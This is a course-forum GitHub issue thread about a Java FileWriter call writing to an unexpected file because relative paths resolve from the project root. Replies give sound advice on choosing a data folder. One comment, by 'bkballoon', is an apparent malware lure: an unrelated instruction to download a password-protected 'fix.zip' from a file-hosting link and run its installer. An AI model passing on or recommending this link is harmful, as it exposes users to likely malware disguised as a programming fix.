### ISSUE TITLE
FileWriter unable to write to text file 

### ISSUE THREAD

**Issue by annabellekk** [nus-cs2103-AY2425S1/forum#95]
I'm facing issues when trying to write to an external file from my program. The program finishes executing without throwing an error however when I check my text file, it is still blank, when instead, it should have the line hello world. Currently, inside my java folder, I have both my txt file test.txt and my program file Dawn.java. I'm using IntelliJ as my IDE. And I call saveTasks as such `saveTasks("./test.txt");` before exiting the program. I am unsure why my program does not write to the file as intended.. 

```java 
private static void saveTasks(String filePath) throws DawnException, IOException {
        FileWriter fw = new FileWriter(filePath);
        try {
            fw.write("hello world");
            fw.close();
        } catch (IOException e) {
            throw new DawnException("Something went wrong: " + e.getMessage());
        }
    }
```

**Comment by Domokunx** [comment]
I believe the program starts checking from your root folder (should be the "ip" folder). So it's possible that some other part of your code is creating a test.txt file in that folder.

**Comment by damithc** [comment]
@annabellekk To confirm you are looking at the right file, you can manually check the timestamp of the file, or delete the file and run the code again to see if the file appears again.

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by annabellekk** [comment]
> I believe the program starts checking from your root folder (should be the "ip" folder). So it's possible that some other part of your code is creating a test.txt file in that folder.

Hi @Domokunx, just to clarify, why might another part of the code create a test.txt file when I specified for FileWriter to open the one I created inside the java directory? Upon checking, I actually see another test.txt file being created inside the ip folder but outside the java folder. And this one contains the hello world line. How should I adjust the file path to make the program write to the specific test.txt file that I created? Thanks! 
<img width="354" alt="Screenshot 2024-08-28 at 3 26 03 PM" src="https://github.com/user-attachments/assets/5b434743-b6fb-4c69-b54b-afffe1ed5538">

**Comment by Feng1231** [comment]
> > I believe the program starts checking from your root folder (should be the "ip" folder). So it's possible that some other part of your code is creating a test.txt file in that folder.
> 
> 
> 
> Hi @Domokunx, just to clarify, why might another part of the code create a test.txt file when I specified for FileWriter to open the one I created inside the java directory? Upon checking, I actually see another test.txt file being created inside the ip folder but outside the java folder. And this one contains the hello world line. How should I adjust the file path to make the program write to the specific test.txt file that I created? Thanks! 
> 
> <img width="354" alt="Screenshot 2024-08-28 at 3 26 03 PM" src="https://github.com/user-attachments/assets/5b434743-b6fb-4c69-b54b-afffe1ed5538">


Just update your input filePath accordingly!

For example, if you would like to save to
....../ip/src/main/java/test.txt,
filePath should be something like 
'src/main/java/test.txt'

**Comment by annabellekk** [comment]
Ohhh I get it now, thank you!

**Comment by damithc** [comment]
> For example, if you would like to save to
> ....../ip/src/main/java/test.txt,
> filePath should be something like
> 'src/main/java/test.txt'

Keep in mind that these are not suitable file locations though -- we can't expect users of your chatbot to have these folders in their computer, and it's not nice for the chatbot to create such folders in their computer either.

**Comment by annabellekk** [comment]
> > For example, if you would like to save to
> > ....../ip/src/main/java/test.txt,
> > filePath should be something like
> > 'src/main/java/test.txt'
> 
> Keep in mind that these are not suitable file locations though -- we can't expect users of your chatbot to have these folders in their computer, and it's not nice for the chatbot to create such folders in their computer either.

Hi, does that mean it's better to use relative paths like ./java/test.txt? But when I tried doing that, the program searches from the top of the repo from ip downwards and instead of accessing the test.txt file in the current directory, it creates a new file in the ip directory.

**Comment by Feng1231** [comment]
I believe prof is trying to say that it is not recommended to be saving your task data inside the java folder. 

For me personally, I created a data folder specifically just to store data.
so it has the file path of
.../ip/data/test.txt

and so the input file path will be saveTasks('./data/test.txt')

Not sure if thats the best practice tho😂

Also, do check that if that folder exists before writing files to that location. Else you will have to handle that case by creating the folder

**Comment by damithc** [comment]
> For me personally, I created a data folder specifically just to store data. so it has the file path of .../ip/data/test.txt
> 
> and so the input file path will be saveTasks('./data/test.txt')

@Feng1231 Yup, that's a reasonable solution, and will look reasonable to the user as well.

**Comment by annabellekk** [comment]
Ok, thank you!
